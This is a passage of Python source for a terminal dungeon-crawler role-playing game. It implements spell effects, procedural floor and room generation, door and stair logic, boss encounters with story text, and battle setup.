def cure(self, invoker, spell, target):\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = self.game.spelldef[spell]\n if spell == 'okiro':\n if target.state in [State.ASLEEP, State.PARALYZED]:\n target.state = State.OK\n mw.print(f\"{target.name} is awaken.\", start=' ')\n v.disp_scrwin()\n elif spell == 'gedoku':\n if target.poisoned:\n target.poisoned = False\n # target.hpplus += 1\n mw.print(f\"{target.name} is cured.\", start=' ')\n v.disp_scrwin()\n\n def etc(self, invoker, spell, target):\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = self.game.spelldef[spell]\n if spell == 'gps':\n self.game.party.gps = True\n elif spell == 'tsubasa':\n party = self.game.party\n fl = mw.input(f\"To which floor? (1-{invoker.deepest})\")\n try:\n fl = int(fl)\n if 0 < fl <= invoker.deepest:\n party.floor_move = 3 # tsubasa; on the upstairs\n party.tsubasa_floor = fl\n return\n except:\n pass\n mw.print(\"What?\")\n v.disp_scrwin()\n elif spell == 'shikibetsu':\n self.game.party.identify = True\n elif spell == 'hogo':\n self.game.party.ac = int(spelldef.value)\n elif spell == 'akari':\n self.game.party.light_cnt += random.randrange(15) + 30\n elif spell == 'hikarinotama':\n self.game.party.light_cnt += 9999\n elif spell == 'kanzen':\n if target.state not in {State.DEAD, State.ASHED, State.LOST}:\n target.hp = target.maxhp\n target.state = State.OK\n if target.poisoned:\n target.poisoned = False\n # target.hpplus += 1\n mw.print(f\"{target.name} is completely healed.\", start=' ')\n elif spell == 'senmetsu':\n monptmp = self.game.battle.monp[:]\n for mong in monptmp:\n mondef = self.game.mondef[mong.name]\n if mong.identified:\n dispname = mondef.names\n else:\n dispname = mondef.unidents\n if mondef.weakmaka:\n self.game.battle.exp += len(mong.monsters) * \\\n mondef.exp\n monsterg = mong.monsters\n for mon in monsterg:\n mon.state = State.DEAD\n # mong.monsters.remove(mon)\n mw.print(f\"{dispname} are perished.\", start=' ')\n # self.game.battle.monp.remove(mong)\n v.disp_scrwin()\n elif spell == 'hinshi':\n if isinstance(invoker, Member):\n mondef = self.game.mondef[target.name]\n if target.identified:\n disptarget = target.name\n else:\n disptarget = mondef.unident\n if random.randrange(100) >= mondef.regspellp:\n damage = max(\n target.monsters[0].hp - random.randrange(7) - 1, 0)\n target.monsters[0].hp -= damage\n mw.print(\n f\"{disptarget} incurred {damage} damage.\", start=' ')\n else:\n mw.print(f\"{disptarget} registed the spell.\", start=' ')\n else:\n target = random.choice([mem for mem in self.game.party.members\n if mem.state in [State.OK, State.ASLEEP]])\n regspellp = target.stat[5] * 100/20 # luck\n if random.randrange(100) >= regspellp:\n damage = max(target.hp - random.randint(7) - 1, 0)\n target.hp -= damage\n mw.print(\n f\"{target.name} incurred {damage} damage.\", start=' ')\n else:\n mw.print(f\"{target.name} registed the spell.\", start=' ')\n elif spell == 'sosei': # party member only\n if target.state != State.DEAD:\n mw.print(f\"{target.name} is not dead.\", start=' ')\n else:\n chance = (target.stat[3]+target.stat[5]) * 100//45\n if random.randrange(100) < chance:\n mw.print(f\"{target.name} is resurrected.\", start=' ')\n target.stat[3] -= 1\n target.state = State.OK\n target.hp = min(target.maxhp, random.randrange(7)+1)\n else:\n mw.print(f\"Failed to resurrect {target.name}.\", start=' ')\n target.state = State.ASHED\n elif spell == 'fukkatsu':\n if target.state not in [State.DEAD, State.ASHED]:\n mw.print(f\"{target.name} is not dead or ashed.\", start=' ')\n else:\n chance = (target.stat[3]+target.stat[5]) * 100//40\n if random.randrange(100) < chance:\n mw.print(f\"{target.name} is resurrected.\", start=' ')\n target.stat[3] -= 1\n target.state = State.OK\n target.hp = target.maxhp\n else:\n mw.print(f\"Failed to resurrect {target.name}.\", start=' ')\n if target.state == State.DEAD:\n target.state = State.ASHED\n else: # was ashed\n target.state = State.LOST\n\n def ac(self, invoker, spell, target):\n \"\"\"\n Decrease peer(s)' or increase opponent(s)' AC\n \"\"\"\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = self.game.spelldef[spell]\n if spelldef.target == 'self':\n if isinstance(invoker, Member):\n invoker.acplus += int(spelldef.value)\n else:\n invoker.ac += int(spelldef.value)\n elif spelldef.target == 'party':\n if isinstance(invoker, Member):\n for m in self.game.party.members:\n m.acplus += int(spelldef.value)\n else:\n for m in self.game.battle.monp[0].monsters:\n m.ac += int(spelldef.value)\n elif spelldef.target == 'enemy':\n if isinstance(invoker, Member):\n target.monsters[0].ac += int(spelldef.value)\n else:\n mem = random.choice(self.game.party.members)\n mem.ac += int(spelldef.value)\n elif spelldef.target == 'group':\n if isinstance(invoker, Member):\n for mon in target.monsters:\n mon.ac += int(spelldef.value)\n else:\n for mem in self.game.party.members:\n mem.ac += int(spelldef.value)\n else: # 'all'\n if isinstance(invoker, Member):\n for mong in self.game.battle.monp:\n for mon in mong:\n mon.ac += int(spelldef.value)\n else:\n for mem in self.game.party.members:\n mem.ac += int(spelldef.value)\n\n def status(self, invoker, spell, target):\n \"\"\"\n Spells that could put to sleep and silence the target group.\n \"\"\"\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = self.game.spelldef[spell]\n if isinstance(invoker, Member):\n if target.identified:\n disptarget = target.name\n else: # unidentified\n disptarget = self.game.mondef[target.name].unident\n for mon in target.monsters:\n if 'sleep' in spelldef.attr and mon.state == State.OK:\n if mon.mdef.weaksleep:\n chance = 80\n else:\n chance = 35\n if random.randrange(100) < chance and \\\n random.randrange(100) >= mon.mdef.regspellp:\n mon.state = State.ASLEEP\n if mon.state == State.ASLEEP:\n mw.print(f\"{disptarget} is slept.\", start=' ')\n else:\n mw.print(f\"{disptarget} is not slept.\", start=' ')\n if 'silence' in spelldef.attr:\n chance = 50 * mon.mdef.regspellp // 100\n if random.randrange(100) < chance or mon.silenced:\n mon.silenced = True\n mw.print(f\"{disptarget} is silenced.\", start=' ')\n else:\n mw.print(f\"{disptarget} is not silenced.\", start=' ')\n else:\n for mem in self.game.party.members:\n if 'sleep' in spelldef.attr and mem.state == State.OK:\n if random.randrange(100) < 35:\n mem.state = State.ASLEEP\n if mem.state == State.ASLEEP:\n mw.print(f\"{mem.name} is slept.\", start=' ')\n else:\n mw.print(f\"{mem.name} is not slept.\", start=' ')\n if 'slience' in spelldef.attr and \\\n (mem.mspells or mem.pspells):\n if random.randrange(100) < 50:\n mem.silenced = True\n if mem.silenced:\n mw.print(f\"{mem.name} is slept.\", start=' ')\n else:\n mw.print(f\"{mem.name} is not slept.\", start=' ')\n\n def death_single(self, target, disptarget):\n mw = self.game.vscr.meswins[-1]\n if isinstance(target, Monster):\n regdeathp = self.game.mondef[target.name].regdeathp\n else:\n # vitality + luck\n regdeathp = (target.stat[3] + target.stat[5]) * 100//40\n if random.randrange(100) >= regdeathp:\n mw.print(f\"{disptarget} is killed.\", start=' ')\n target.hp = 0\n target.state = State.DEAD\n else:\n mw.print(f\"{disptarget} is alive.\", start=' ')\n\n def attack(self, invoker, spell, target):\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = self.game.spelldef[spell]\n if not isinstance(invoker, Member):\n if spelldef.target == 'enemy':\n mem = random.choice(self.game.party.members)\n if spelldef.type == 'death':\n death_single(mem, mem.name)\n else:\n damage = dice(spelldef.value)\n mw.print(\n f\"{mem.name} incurred {damage} damage.\", start=' ')\n v.disp_scrwin()\n mem.hp = max(0, mem.hp - dice(spelldef.value))\n if mem.hp <= 0 and \\\n mem.state not in [State.DEAD, State.ASHED, State.LOST]:\n mem.state = State.DEAD\n mw.print(f\"{mem.name} is killed.\", start=' ')\n else: # 'group' or 'all\n for mem in self.game.party.members:\n if spelldef.type == 'death':\n death_single(mem, mem_name)\n else:\n damage = dice(spelldef.value)\n mw.print(\n f\"{mem.name} incurred {damage} damage.\", start=' ')\n mem.hp = max(0, mem.hp - dice(spelldef.value))\n if mem.hp <= 0 and \\\n mem.state not in [State.DEAD, State.ASHED, State.LOST]:\n mem.state = State.DEAD\n mw.print(f\"{mem.name} is killed.\", start=' ')\n return\n if spelldef.target == 'group':\n if target.identified:\n disptarget = target.name\n else: # unidentified\n disptarget = self.game.mondef[target.name].unident\n if spell == 'shinoroi': # lakanito\n for mon in target.monsters:\n self.death_single(mon, disptarget)\n else:\n for mon in target.monsters:\n self.attack_single(\n mon, disptarget,\n spelldef.value, spelldef.attr, target, invoker)\n elif spelldef.target == 'all':\n for mong in self.game.battle.monp:\n if mong.identified:\n disptarget = mong.name\n else:\n disptarget = self.game.mondef[mong.name].unident\n for mon in mong.monsters:\n self.attack_single(mon, disptarget,\n spelldef.value, spelldef.attr, mong, invoker)\n elif spelldef.target == 'enemy':\n if target.identified:\n disptarget = target.name\n else:\n disptarget = self.game.mondef[target.name].unident\n if spelldef.type == 'death':\n self.death_single(target, disptarget)\n elif spell != 'butsumetsu' or \\\n self.game.mondef[target.name].type != 'undead':\n self.attack_single(target.monsters[0], disptarget,\n spelldef.value, spelldef.attr, target, invoker)\n monptmp = self.game.battle.monp[:]\n for mong in monptmp:\n mongtmp = mong.monsters[:]\n for mon in mongtmp:\n if mon.hp <= 0:\n mong.monsters.remove(mon)\n if not mong.monsters:\n self.game.battle.monp.remove(mong)\n\n def attack_single(self, mon, dispname, value, attr, mong, invoker):\n if mon.state == State.DEAD:\n return\n v = self.game.vscr\n mw = v.meswins[-1]\n damage = dice(value)\n mondef = self.game.mondef[mon.name]\n if mondef.regspellp > random.randrange(100):\n mw.print(f\"{dispname} registed.\")\n return\n if 'fire' in attr:\n if mondef.regfire:\n damage = damage // 2\n elif 'cold' in attr:\n if mondef.regcold:\n damage = damage // 2\n if 'poison' in attr:\n if not mondef.regpoison and random.randrange(100) < 50:\n mon.poisoned = True\n mon.hpplus = -1\n mw.print(f\"{dispname} was poisoned.\", start=' ')\n mon.hp = max(mon.hp-damage, 0)\n mw.print(f\"{dispname} incurred {damage} damage.\", start=' ')\n if mon.hp <= 0:\n mw.print(f\"{dispname} is killed.\", start=' ')\n mon.state = State.DEAD\n self.game.battle.exp += mondef.exp\n invoker.marks += 1\n\n def heal(self, invoker, spell, target):\n sdef = self.game.spelldef[spell]\n if not isinstance(invoker, Member):\n if sdef.target == 'party':\n for mon in self.game.battle.monp[0].monsters:\n self.heal_single(spell, sdef, mon)\n else:\n self.heal_single(spell, sdef, invoker)\n return\n if sdef.target == 'party':\n for target in self.game.party.members:\n self.heal_single(spell, sdef, target)\n else:\n self.heal_single(spell, sdef, target)\n\n def heal_single(self, sname, sdef, target):\n plus = dice(sdef.value)\n target.hp = min(target.hp+plus, target.maxhp)\n mw = self.game.vscr.meswins[-1]\n if target.hp == target.maxhp:\n mw.print(f\"{target.name}'s HP was fully restored.\", start=' ')\n else:\n mw.print(f\"{plus} HP was restored to {target.name}.\", start=' ')\n\n\nclass Dungeon:\n \"\"\"\n Represents the dungeon\n \"\"\"\n\n def __init__(self, game):\n self.game = game\n self.floors = [] # list of floor objects\n self.events = [] # list of events (floor, eventid)\n self.generate_events()\n\n def generate_events(self):\n \"\"\"\n Generate important events when creating a dungeon.\n Later, events need to be placed on creating floors\n \"\"\"\n # generate keys\n self.events.append((Evloctype.RANDOM, 3, Eventid.KEY))\n self.events.append((Evloctype.RANDOM, 6, Eventid.KEY))\n self.events.append((Evloctype.RANDOM, 9, Eventid.KEY))\n self.events.append((Evloctype.RANDOM, 10, Eventid.KEY))\n\n # generate bosses\n self.events.append((Evloctype.DOWNSTAIRS, 3, Eventid.BOSS))\n self.events.append((Evloctype.DOWNSTAIRS, 6, Eventid.BOSS))\n self.events.append((Evloctype.DOWNSTAIRS, 9, Eventid.BOSS))\n self.events.append((Evloctype.DOWNSTAIRS, 10, Eventid.BOSS))\n\n def generate_move_floors(self):\n \"\"\"\n Check if floor_move, generate floors if not generated yet,\n and place party on the upstairs or the downstairs\n \"\"\"\n party = self.game.party\n if not party.floor_move:\n return\n\n floor = party.floor\n if party.floor_move == 1:\n floor += 1\n elif party.floor_move == 3:\n floor = party.tsubasa_floor\n for idx in range(floor):\n if len(self.floors) < idx+1:\n floor_obj = self.generate_floor(idx+1)\n self.floors.append(floor_obj)\n\n if party.floor_move == 1: # down; on the upstairs\n floor_obj = self.floors[party.floor]\n party.floor_obj = floor_obj\n party.move(floor_obj.rooms[0].center_x,\n floor_obj.rooms[0].center_y,\n floor=party.floor+1)\n elif party.floor_move == 2: # 2: up; on the downstairs\n floor_obj = self.floors[party.floor-2]\n party.floor_obj = floor_obj\n party.move(floor_obj.rooms[-1].center_x,\n floor_obj.rooms[-1].center_y,\n floor=party.floor-1)\n else: # tsubasa; on the upstairs\n floor_obj = self.floors[party.tsubasa_floor-1]\n party.floor_obj = floor_obj\n party.move(floor_obj.rooms[0].center_x,\n floor_obj.rooms[0].center_y,\n floor=party.tsubasa_floor)\n party.floor_move = 0\n\n for m in party.members:\n m.deepest = max(m.deepest, party.floor)\n\n def generate_floor(self, floor):\n \"\"\"\n Generate a dungeon floor.\n Create rooms, connect among them and place doors\n \"\"\"\n floor_x_size = min(256, 48 + 24*floor)\n floor_y_size = min(128, 20 + 10*floor)\n floor_data = bytearray(b'#' * floor_x_size *\n floor_y_size) # rock only floor\n floor_obj = Floor(floor_x_size, floor_y_size, floor, floor_data)\n\n rooms = floor_obj.prepare_rooms()\n for r in rooms:\n for y in range(r.y_size):\n start = (r.y + y)*floor_x_size + r.x\n floor_obj.floor_view[start:start+r.x_size] = b'.'*r.x_size\n floor_obj.connect_all_rooms(rooms)\n floor_obj.place_doors(self.game, rooms)\n floor_obj.rooms = rooms\n floor_obj.floor_orig = floor_obj.floor_data\n floor_obj.place_events(self)\n floor_obj.floor_data = bytearray(b'^' * floor_x_size * floor_y_size)\n return floor_obj\n\n def check_move_floor(self, floor_obj):\n \"\"\"\n Check if move to upper/lower floor.\n Return True if exit, False not.\n \"\"\"\n game = self.game\n party = game.party\n vscr = game.vscr\n meswin = vscr.meswins[0]\n\n if floor_obj.get_tile(party.x, party.y) == b'<': # upstairs\n vscr.disp_scrwin(floor_obj)\n if party.floor == 1:\n c = meswin.input_char(\"Exit from dungeon? (y/n)\",\n values=['y', 'n'])\n else:\n c = meswin.input_char(\n \"Stairs. Go up? (y/n)\", values=['y', 'n'])\n if c == 'y':\n party.floor_move = 2 # go up\n elif floor_obj.get_tile(party.x, party.y) == b'>': # downstairs\n vscr.disp_scrwin(floor_obj)\n c = meswin.input_char(\n \"Stairs. Go down? (y/n)\", values=['y', 'n'])\n if c == 'y':\n party.floor_move = 1 # go down\n\n if party.floor_move:\n if party.floor <= 1 and party.floor_move == 2: # exit from dungeon\n meswin.cls()\n party.place = Place.EDGE_OF_TOWN\n return True # Exit from dungeon\n\n return False\n\n\nclass Floor:\n # Represents a floor in the dungeon\n def __init__(self, x_size, y_size, floor, floor_data):\n self.x_size = x_size\n self.y_size = y_size\n self.floor = floor\n self.floor_data = floor_data\n self.floor_view = memoryview(floor_data)\n self.battled = []\n self.rooms = None\n self.up_x = self.up_y = 0\n self.down_x = self.down_y = 0\n self.events = {} # event list. key is (x, y), value is [eventID, done]\n\n def __repr__(self):\n s = self.floor_data.decode()\n return f\"Floor(size: {self.x_size}x{self.y_size}, floor: {self.floor} - {s})\"\n\n def ending(self, game):\n \"\"\"\n Show ending messages\n \"\"\"\n v = game.vscr\n v.cls()\n mw = v.meswins[-1]\n mw.print(\"Although defeated, the demonic figure looks intact.\")\n mw.print(\"He talked in a calm voice.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'Good. You are exceptionally good soldiers. I am impressed.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'You earthlings have defeated a self of mine. It was a good battle.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'You have just broken the self of order. Now, chaos has been brought to your world. Ancient gods and daemomns are released. You will see all kinds of plagues and disasters.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'To prevent it from happening, you will need to go further deep. Look for those gods and daemons, and defeat them.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'But, they are immortals. You can not just kill them. You need to defeat them again and again.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'I will also wait for you again. Meet me at further deep down. My other selves want to have fun, too.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"The demonic figure fell slient. And before your eyes, he started to become transparent, and disappeared in the air.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"You just knew that you have changed something important in a non-reversal way.\")\n v.disp_scrwin()\n getch(wait=True)\n\n def boss(self, game):\n v = game.vscr\n mw = Meswin(v, v.width//8, v.height//6,\n v.width*3//4, 4, frame=True)\n v.meswins.append(mw)\n if game.party.floor == 3:\n mw.print(\"You saw a small child standing on downstairs.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\"Suddenly, he srated running toward you.\")\n v.disp_scrwin()\n getch(wait=True)\n elif game.party.floor == 6:\n mw.print(\n \"You see a skinny woman wearing a chic black dress, as if she is going to a dinner party.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\"You thought you know her. She smiled at you.\")\n v.disp_scrwin()\n getch(wait=True)\n elif game.party.floor == 9:\n mw.print(\"In this high-ceiling room is a huge blue giant.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"You can't see his face, but it's evident that he is excited to see new preys.\")\n v.disp_scrwin()\n getch(wait=True)\n elif game.party.floor == 10:\n mw.print(\"'Welcome.' The demonic figure said.\")\n mw.print(\"'It has been long since I last met earthlings like you.'\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\"He looks to be enjoying this encounter.\")\n v.disp_scrwin()\n getch(wait=True)\n game.vscr.meswins[-2].print(\"*** boss battle ***\")\n game.battle.boss = True\n game.battle.battle()\n game.battle.boss = False\n if not game.battle.treasure or \\\n not game.party.members: # lost the battle\n v.meswins.pop()\n return\n game.chest.chest()\n if game.party.defeated():\n v.meswins.pop()\n return\n survnum = sum(1 for m in game.party.members\n if m.state in [State.OK, State.ASLEEP,\n State.PARALYZED, State.STONED])\n mw.print(f\"Each survivor gets {game.battle.exp//survnum} e.p.\",\n start=' ')\n mw.print(f\"Each survivor gets {game.battle.gold//survnum} gold.\",\n start=' ')\n v.disp_scrwin()\n for mem in game.party.members:\n if mem.state == State.ASLEEP:\n mem.state = State.OK\n if mem.state in [State.OK, State.PARALYZED, State.STONED]:\n mem.exp += game.battle.exp//survnum\n mem.gold += game.battle.gold//survnum\n getch(wait=True)\n mw.cls()\n if game.party.floor == 10: # The last boss?\n self.ending(game)\n else:\n mw.print(\"You won the battle, but it was no ordinary monster.\")\n mw.print(\"You see downstairs appearing in front of you.\")\n v.disp_scrwin()\n getch(wait=True)\n v.meswins.pop()\n\n def key(self, game):\n if game.party.floor == 3:\n key = 'ivory'\n keys = ['ivory ley', 'bronze key', 'silver key', 'gold key']\n elif game.party.floor == 6:\n key = 'bronze'\n keys = ['bronze key', 'silver key', 'gold key']\n elif game.party.floor == 9:\n key = 'silver'\n keys = ['silver key', 'gold key']\n elif game.party.floor == 10:\n key = 'gold'\n keys = ['gold key']\n elif game.party.floor >= 11:\n key = 'one time password'\n keys = [key]\n if not game.party.have_items(keys):\n v = game.vscr\n mw = Meswin(v, v.width//8, v.height//6,\n v.width*3//4, 8, frame=True)\n v.meswins.append(mw)\n mw.print(f\"You see a {key} statue on a small stone table.\")\n mw.print(f\"The {key} statue is intricate and lively.\")\n mw.print(f\"You thought you need to touch the statue.\")\n if mw.input_char(\"Search? (y/n)\") == 'y':\n game.chest.get_item(key+' key')\n v.meswins.pop()\n v.disp_scrwin()\n\n def random_message(self, game):\n v = game.vscr\n mw = Meswin(v, v.width//8, v.height//6,\n v.width*3//4, 8, frame=True)\n v.meswins.append(mw)\n messages = random.choice(random_messages)\n for i, message in enumerate(messages):\n if i == 0:\n mw.print(message)\n v.disp_scrwin()\n else:\n getch(wait=True)\n mw.print(message, start=' ')\n v.disp_scrwin()\n mw.print(\" - press space bar\")\n v.disp_scrwin()\n while True:\n if getch(wait=True) == ' ':\n break\n v.meswins.pop()\n v.disp_scrwin()\n\n def check_event(self, game):\n \"\"\"\n Check and process an event.\n Return True if processed an event.\n \"\"\"\n x = game.party.x\n y = game.party.y\n if (x, y) not in self.events or self.events[(x, y)][1]:\n return False\n evid = self.events[(x, y)][0]\n if evid == Eventid.RNDMSG:\n self.random_message(game)\n self.events[(x, y)][1] = True # processed\n return True\n elif evid == Eventid.KEY:\n self.key(game)\n elif evid == Eventid.BOSS:\n self.boss(game)\n if game.party.members and not game.battle.ran:\n self.events[(x, y)][1] = True # processed\n return True\n return False # Will see the event again\n\n def place_events(self, dungeon):\n \"\"\"\n Place events on random or specific type location\n \"\"\"\n for ev in dungeon.events:\n if ev[1] != self.floor: # event[1] is floor\n continue\n if ev[0] == Evloctype.RANDOM:\n while True:\n x = random.randrange(self.x_size)\n y = random.randrange(self.y_size)\n if self.get_tile(x, y) == b'.': # floor tile\n break\n self.put_tile(x, y, b',')\n self.events[(x, y)] = [ev[2], False] # event[2] is eventid\n elif ev[0] == Evloctype.DOWNSTAIRS:\n x = self.rooms[-1].center_x\n y = self.rooms[-1].center_y\n self.events[(x, y)] = [ev[2], False] # eventid\n\n if self.floor >= 11:\n while True:\n x = random.randrange(self.x_size)\n y = random.randrange(self.y_size)\n if self.get_tile(x, y) == b'.': # floor tile\n break\n self.put_tile(x, y, b',')\n self.events[(x, y)] = [Eventid.KEY, False]\n\n # place random messages\n for _ in range(1 + random.randrange(2)): # 1 to 3 messages\n while True:\n x = random.randrange(self.x_size)\n y = random.randrange(self.y_size)\n if self.get_tile(x, y) == b'.': # floor tile\n break\n self.put_tile(x, y, b',')\n self.events[(x, y)] = [Eventid.RNDMSG, False]\n\n def get_tile(self, x, y):\n \"\"\"\n Return the byte character representing the tile on\n the specified (x, y) location\n \"\"\"\n if x >= self.x_size or x < 0:\n return b'^'\n if y >= self.y_size or y < 0:\n return b'^'\n pos = y * self.x_size + x\n return self.floor_orig[pos:pos+1]\n\n def put_tile(self, x, y, bc, orig=True):\n \"\"\"\n Place the tile byte character to (x, y) location.\n If orig flag is False, place it on the virtual map\n \"\"\"\n if 0 <= x < self.x_size and 0 <= y < self.y_size:\n pos = y * self.x_size + x\n if orig:\n self.floor_orig[pos:pos+1] = bc\n else:\n self.floor_data[pos:pos+1] = bc\n\n def can_move(self, x, y):\n \"\"\"\n Utility function to check if they can move to\n (x, y).\n \"\"\"\n bc = self.get_tile(x, y)\n if bc in b\"*+%#^\":\n return False\n return True\n\n def open_door(self, game, mw):\n \"\"\"\n Open a door. If it's a locked door ('*'), unlock and\n open it. Unlock could fail.\n \"\"\"\n x = game.party.x\n y = game.party.y\n c = mw.input_char(\"Which direction? - ;)leave\",\n values=['h', 'j', 'k', 'l', ';'])\n if c == ';':\n return\n elif c == 'h':\n x -= 1\n elif c == 'l':\n x += 1\n elif c == 'j':\n y += 1\n elif c == 'k':\n y -= 1\n tile = self.get_tile(x, y)\n if tile == b'+':\n mw.print(\"Opened.\")\n self.put_tile(x, y, b'.')\n elif tile == b'*':\n if game.party.can_open(game):\n mw.print(\"Unlocked.\")\n self.put_tile(x, y, b'.')\n else:\n mw.print(\"No luck.\")\n elif tile == b'%':\n if game.party.can_open(game, ch=b'%'):\n mw.print(\"Unlocked.\")\n self.put_tile(x, y, b'.')\n if game.party.floor >= 11:\n game.party.consume_item('one time password')\n else:\n mw.print(\"You need the key.\")\n else:\n mw.print(\"Not a door.\")\n\n def draw_line(self, x1, y1, x2, y2):\n \"\"\"\n Utility generator function to draw a straight line.\n Must eithr be vertical (x1==x2) or horizontal (y1==y2).\n \"\"\"\n if x1 < x2:\n x1, x2 = x2, x1\n if y1 < y2:\n y1, y2 = y2, y1\n while x1 > x2 or y1 > y2:\n yield x2, y2\n if x1 > x2:\n x2 += 1\n if y1 > y2:\n y2 += 1\n yield x2, y2\n\n def connect_rooms(self, r1, r2):\n \"\"\"\n Create a hallway between two rooms and connect them.\n \"\"\"\n if random.randrange(2) == 0: # 1/2\n cx = r1.center_x\n cy = r2.center_y\n else:\n cx = r2.center_x\n cy = r1.center_y\n for x, y in self.draw_line(r1.center_x, r1.center_y, cx, cy):\n pos = self.x_size * y + x\n self.floor_view[pos:pos+1] = b'.'\n for x, y in self.draw_line(r2.center_x, r2.center_y, cx, cy):\n pos = self.x_size * y + x\n self.floor_view[pos:pos+1] = b'.'\n\n def prepare_rooms(self):\n \"\"\"\n Return a list filled with Rooms objects on a floor.\n \"\"\"\n rooms = []\n for _ in range(1024):\n rx = 3 + random.randrange(10)\n ry = 3 + random.randrange(4)\n room = Room(random.randrange(self.x_size-rx+1),\n random.randrange(self.y_size-ry+1),\n rx, ry)\n intersect = False\n for r in rooms:\n if room.rooms_intersect(r):\n intersect = True\n break\n if not intersect:\n rooms.append(room)\n self.battled.append(False)\n return rooms\n\n def connect_all_rooms(self, rooms):\n \"\"\"\n Connect all rooms with hallways.\n Try to find and connect with the nearest room.\n \"\"\"\n rooms.sort(key=lambda room: room.y+room.y_size//2)\n rooms.sort(key=lambda room: room.x+room.x_size//2)\n rs = rooms[:]\n r_src = rs.pop()\n newrooms = [r_src]\n while rs:\n idx_near = 0\n len_rs = len(rs)\n for i in range(len_rs): # look for the nearest room\n if r_src.distsq_rooms(rs[i]) < r_src.distsq_rooms(rs[idx_near]):\n idx_near = i\n r_near = rs.pop(idx_near)\n self.connect_rooms(r_src, r_near)\n r_src = r_near\n newrooms.append(r_src)\n rooms = newrooms\n\n def place_door(self, x, y, dc):\n \"\"\"\n Utility function to check and place a door\n \"\"\"\n if 0 <= x < self.x_size and 0 <= y < self.y_size:\n pos = y*self.x_size + x\n c = self.floor_view[pos:pos+1]\n if c == b'.' or c == b'+':\n self.floor_view[pos:pos+1] = dc\n\n def place_doors(self, game, rooms):\n \"\"\"\n Place locked or unlocked doors in front of rooms.\n \"\"\"\n for r in rooms:\n dc = b'+' # door character\n if random.randrange(10) == 0: # 10%\n dc = b'*' # locked door\n if (self.floor in [3, 6, 9, 10] or self.floor >= 11) \\\n and r is rooms[-1]:\n dc = b'%' # special locked door that requires a key\n for x in range(r.x_size): # top and bottom edges\n self.place_door(r.x+x, r.y-1, dc)\n self.place_door(r.x+x, r.y+r.y_size, dc)\n\n for y in range(r.y_size): # left and right edges\n self.place_door(r.x-1, r.y+y, dc)\n self.place_door(r.x+r.x_size, r.y+y, dc)\n\n if r == rooms[0]:\n pos = r.center_y*self.x_size + r.center_x\n self.floor_view[pos:pos+1] = b'<' # up stair\n self.up_x = r.center_x\n self.up_y = r.center_y\n\n if r == rooms[-1]:\n pos = r.center_y*self.x_size + r.center_x\n self.floor_view[pos:pos+1] = b'>' # down stair\n self.down_x = r.center_x\n self.down_y = r.center_y\n\n\nclass Room:\n # Represents a room on a dungeon floor\n def __init__(self, x, y, x_size, y_size):\n self.x = x\n self.y = y\n self.x_size = x_size\n self.y_size = y_size\n self.center_x = x + x_size//2\n self.center_y = y + y_size//2\n\n def __repr__(self):\n return f\"Room(x/y: {self.x}/{self.y}, size: {self.x_size}/{self.y_size})\"\n\n def in_room(self, x, y):\n \"\"\"\n Return if (x, y) is in the room\n \"\"\"\n if self.x <= x < self.x+self.x_size:\n if self.y <= y < self.y+self.y_size:\n return True\n return False\n\n def rooms_intersect(self, r):\n \"\"\"\n Return True if two rooms are intersected.\n \"\"\"\n return max(self.x, r.x) <= min(self.x+self.x_size, r.x+r.x_size) \\\n and max(self.y, r.y) <= min(self.y+self.y_size, r.y+r.y_size)\n\n def distsq_rooms(self, r):\n \"\"\"\n Calculate distance between two rooms.\n Will return distance**2.\n \"\"\"\n return (self.x+self.x_size//2 - (r.x+r.x_size//2))**2 \\\n + (self.y+self.y_size//2 - (r.y+r.y_size//2))**2\n\n\nclass Monster:\n \"\"\"\n Represents a monster\n \"\"\"\n\n def __init__(self, game, name):\n self.game = game\n self.name = name\n self.mdef = self.game.mondef[name]\n self.hp = self.maxhp = dice(self.mdef.hp)\n self.hpplus = 0\n self.ac = self.mdef.ac\n self.state = State.OK\n self.silenced = False\n self.poisoned = False\n\n\nclass Monstergrp:\n \"\"\"\n Represents a monster group\n \"\"\"\n\n def __init__(self, game, name):\n self.game = game\n self.name = name\n self.mdef = self.game.mondef[name]\n self.monsters = []\n self.identified = False\n\n\nclass Battle:\n \"\"\"\n Represents battles\n \"\"\"\n\n def __init__(self, game):\n self.game = game\n self.boss = False\n self.ran = False # ran from the battle flag\n v = game.vscr\n self.mw = Meswin(v, v.width//8, v.height//8+4,\n v.width*3//4, 10, frame=True)\n self.ew = Meswin(v, v.width//8, v.height//8-1,\n v.width*3//4, 4, frame=True)\n\n def new_battle(self):\n \"\"\"\n Clear variables for a new battle\n \"\"\"\n self.friendly = False\n self.exp = 0 # gained exp from this battle\n self.gold = 0 # gained gold from this battle\n self.room_index = -1 # random encounter\n self.monp = [] # includes monster group(s)\n self.entities = [] # includes party member or monster\n self.treasure = True # treasure\n if random.randrange(100) < 10:\n self.surprised = 1 # you surprised the monsters\n elif random.randrange(100) < 10:\n self.surprised = 2 # monsters surprised you\n else:\n self.surprised = 0\n self.ran = False # ran flag\n for m in self.game.party.members:\n m.action = '????????????'\n m.drained = False\n m.acplus = 0\n m.silenced = False\n\n def draw_ew(self):\n \"\"\"\n draw enemy window that lists the monster groups and number\n of monsters in them\n \"\"\"\n self.ew.cls()\n for i, mg in enumerate(self.monp, 1):\n active = 0\n if self.friendly or self.game.party.identify:\n mg.identified = True\n if mg.identified:\n dispname = mg.name\n if len(mg.monsters) > 1:\n dispname = mg.mdef.names\n else:\n dispname = mg.mdef.unident\n if len(mg.monsters) > 1:\n dispname = mg.mdef.unidents\n for m 